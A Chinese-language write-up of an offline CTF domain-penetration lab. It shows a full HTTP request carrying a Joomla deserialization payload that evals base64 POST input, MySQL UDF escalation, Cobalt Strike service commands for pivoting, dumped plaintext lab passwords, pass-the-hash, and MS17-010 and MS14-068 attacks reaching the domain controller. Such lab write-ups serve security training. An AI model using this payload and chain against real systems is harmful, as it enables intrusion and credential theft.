域渗透复盘(安洵CTF线下)

复盘线下域渗透环境Write Up

0x01 外网web到DMZ进域

外网web入口

joomla应用   192.168.0.5

反序列化打下来

GET /index.php HTTP/1.1
Host: 192.168.0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/ Firefox/30.0
x-forwarded-for: }__test|O::"JDatabaseDriverMysqli"::{s::"fc";O::"JSimplepieFactory"::{}s::"disconnectHandlers";a::{i:;a::{i:;O::"SimplePie"::{s::"sanitize";O::"JDatabaseDriverMysql"::{}s::"feed_url";s::"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s::"cache_name_function";s::"assert";s::"cache";b:;s::"cache_class";O::"JDatabaseDriverMysql"::{}}i:;s::"init";}}s::"connection";b:;}𝌆
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 80769d143cf4e67e347c880ead30ac73=djsjbbmhgdsrk6dn0iad8v19u2; b812b2d89fbf4cac6fc4b47aa2976990=hicdivfaafd7h0d29oj2d60v47
Connection: close
Upgrade-Insecure-Requests: 1

POST /index.php HTTP/1.1
Host: 192.168.0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/ Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Cookie: 80769d143cf4e67e347c880ead30ac73=djsjbbmhgdsrk6dn0iad8v19u2; b812b2d89fbf4cac6fc4b47aa2976990=hicdivfaafd7h0d29oj2d60v47
Connection: close
Upgrade-Insecure-Requests: 1

111=cGhwaW5mbygpOw%3d%3d

拿到这台web1权限后 发现站库分离  mysql数据库为同192段的192.168.0.6

发现是root用户

UDF提权拿到web1-DB的权限。

直连192.168.0.6发现有限制，所以通过web1服务器代理连接web1-db

查看secure_file_priv

root用户直接改

mysql 5.6.34版本以后 secure_file_priv的值默认为NULL

真实比赛时候这里是给改了的 ，不过也可以使用慢查询getshell 而且web1和web1-db本地管理密码是可以撞出来的 。

web1-db在192段测试可以出外网的  点马

这台db权限稳了以后，打dmz进域。

然后发现web1-db双网卡 有10段的ip  扫描存活发现10.0.0.4开放80  开socks代理打这台web

工具无所谓 ew这些一样的。

扫描目录发现shell.php为一句话 可尝试爆破 cms采用tp3 后台爆破后存在弱口令

登录后台发现界面功能中的模版管理 getshell

至此看到域。

C:\phpStudy\PHPTutorial\WWW\> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : corework-websrv1
   Primary Dns Suffix  . . . . . . . : corework.com
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : corework.com

Ethernet adapter 本地连接 :

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/ MT Network Connection #
   Physical Address. . . . . . . . . : -0C---EF-5A
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.0.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.0
   DNS Servers . . . . . . . . . . . : 8.8.8.8

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/ MT Network Connection
   Physical Address. . . . . . . . . : -0C---EF-
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 10.0.0.4
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.0
   DNS Servers . . . . . . . . . . . : 10.0.0.3

0x02 域内横向

这里域内web可以直接出外网 还是宽松了很多 。

而大多时候域中很多服务器出不了外网 只有跳板访问，这里就不直接反弹外网了，假设这里并不能直接出外网，种个正向跳板。

run sc \\10.0.0.4 config msdtc obj=localsystem
run sc \\10.0.0.4 stop msdtc
run sc \\10.0.0.4 start msdtc
link 10.0.0.4

域中第一台web也就是srv1稳下来后 进行横向扩权限  探测发现10段中存在以下主机

10.0.0.4 win2003

10.0.0.3 win2008  DC

10.0.0.8 win7

尝试抓密码

cs自带的只能部分 上exe的

web1密码:

本机：
administrator / CQXzxc!

域成员；
webadmin / web#Admin998

打了1997补丁还是可以pth传递 这里直接有明文 撞。

哈希传递发现同webadmin帐号可登录另一台win2003  srv2 10.0.0.5

而在这台上发现vpn拨号 以及172段的网卡。

Windows IP Configuration

   Host Name . . . . . . . . . . . . : corework-09b6ed
   Primary Dns Suffix  . . . . . . . : corework.com
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : corework.com

Ethernet adapter VPN - VPN Client:

   Media State . . . . . . . . . . . : Media disconnected
   Description . . . . . . . . . . . : VPN Client Adapter - VPN
   Physical Address. . . . . . . . . : -AC--F1-A2-1E

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/ MT Network Connecti
   Physical Address. . . . . . . . . : -0C--0B-DC-
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 10.0.0.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.0.0
   DNS Servers . . . . . . . . . . . : 10.0.0.3

10.0.0.5 srv2密码:

本机：
administrator / ojx%987AAA

域成员；
webadmin / web#Admin998

10.0.0.5的机子撞密码得到win7(10.0.0.8)权限:

dir \\10.0.0.8\c$

 \\10.0.0.8\c$ 的目录

//  :                  AUTOEXEC.BAT
//  :                  CONFIG.SYS
//  :    <DIR>          Documents and Settings
//  :    <DIR>          mimikatz
//  :    <DIR>          mimikatz_trunk
//  :    <DIR>          Program Files
//  :    <DIR>          WINDOWS
//  :    <DIR>          wmpub
                个文件               字节
                个目录 ,,, 可用字节

这里的win7可以直接出来，所以可以再点个反向，但是如果出不来 又要做一层代理 三层代理 用win7打域控

这里域内主机都开了445  所以17010必须尝试 无果后尝试14068

这里直接开的3389 来14068攻击

生成凭据:

传递内存:

拿到域控DC.

srv2这台还发现vpn的172段 拨过去。

拨进去发现172.16段存在另一台win7  172.16.0.6

尝试17010  拿到权限。

C:\Users\Administrator>hostname
WIN-6DPULQIIMAD

C:\Users\Administrator>whoami
win-6dpulqiimad\administrator

C:\Users\Administrator>ipconfig

Windows IP 配置

以太网适配器 VPN - VPN Client:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::d53e:8c8:e908:65d1%
   IPv4 地址 . . . . . . . . . . . . : 172.16.0.6
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.16.0.0

隧道适配器 isatap.{B8A8B4D0-D928-4B6C-BBB5-169CD3DD0A56}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{171C28A5-5AAC-40B1-A703-5653E5691E94}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

结束。

最后的这次域渗透结构图